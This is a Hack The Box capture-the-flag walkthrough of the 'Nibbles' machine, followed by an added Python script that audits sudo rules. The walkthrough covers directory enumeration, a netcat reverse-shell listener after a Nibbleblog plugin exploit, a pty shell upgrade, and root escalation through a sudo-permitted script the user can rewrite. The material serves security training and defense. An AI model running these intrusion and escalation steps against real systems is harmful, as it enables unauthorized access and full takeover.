[Hack The Box] Trying Nibbles

Information gathering

Run a port scan with Sparta.

dirb http://10.10.10.75/nibbleblog/
---- Scanning URL: http://10.10.10.75/nibbleblog/ ----
==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/
+ http://10.10.10.75/nibbleblog/admin.php (CODE:200|SIZE:1401)
==> DIRECTORY: http://10.10.10.75/nibbleblog/content/
+ http://10.10.10.75/nibbleblog/index.php (CODE:200|SIZE:2987)
==> DIRECTORY: http://10.10.10.75/nibbleblog/languages/
==> DIRECTORY: http://10.10.10.75/nibbleblog/plugins/
+ http://10.10.10.75/nibbleblog/README (CODE:200|SIZE:4628)
==> DIRECTORY: http://10.10.10.75/nibbleblog/themes/
root@kali:~# curl http://10.10.10.75/nibbleblog/content/private/users.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users><user username="admin"><id type="integer">0</id>
root@kali:~# curl http://10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

Exploiting the Nibbleblog vulnerability

Google Nibbleblog 4.0.3.

nc -lvp 1234
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
root@kali:~# nc -lvp 1234
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Escalating privileges

The shell keeps cutting out. 👇 Upgrade the shell with this technique. To be honest, I don't really understand why this happens.

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
nibbler@Nibbles:/$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$ cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
mkdir -p /home/nibbler/personal/stuff
cd /home/nibbler/personal/stuff
vi monitor.sh
#!/bin/sh
bash
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
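
The escalation works because the sudoers rule points at a script inside a directory that nibbler owns, so nibbler decides what runs as root. The following is an added example for auditing such rules, not code from the original post: it extracts command paths from `sudo -l` output and flags any path component that is missing, not owned by root, or group/world-writable. The names `sudo_commands`, `audit` and the `stat_fn` parameter are hypothetical and chosen for this example.

```python
import os
import re
import stat

# `sudo -l` rule lines look like: (root) NOPASSWD: /path/to/cmd, /other/cmd
RULE = re.compile(r"^\s*\([^)]*\)\s+(?:[A-Z]+:\s*)*(?P<cmds>/.*)$")

# The rule shown in the write-up's `sudo -l` output.
SAMPLE = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

def sudo_commands(sudo_l_output):
    """Return the absolute command paths granted in `sudo -l` output."""
    paths = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if m:
            for cmd in m.group("cmds").split(","):
                if cmd.strip().startswith("/"):
                    paths.append(cmd.split()[0])
    return paths

def audit(path, trusted_uids=(0,), stat_fn=os.stat):
    """List reasons an untrusted user could control what `path` runs.

    Walks from the command up to "/"; stat_fn is injectable so the check
    can be exercised against a constructed file tree (an assumption of
    this example, not a sudo feature).
    """
    findings = []
    current = path
    while True:
        try:
            st = stat_fn(current)
        except OSError:
            findings.append(f"{current}: missing or unreadable")
        else:
            if st.st_uid not in trusted_uids:
                findings.append(f"{current}: owned by uid {st.st_uid}")
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"{current}: group- or world-writable")
        parent = os.path.dirname(current)
        if parent == current:
            return findings
        current = parent

if __name__ == "__main__":
    for command in sudo_commands(SAMPLE):
        for finding in audit(command):
            print(finding)
```

Any finding means the rule should be moved to a root-owned script in a root-owned directory, or removed.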
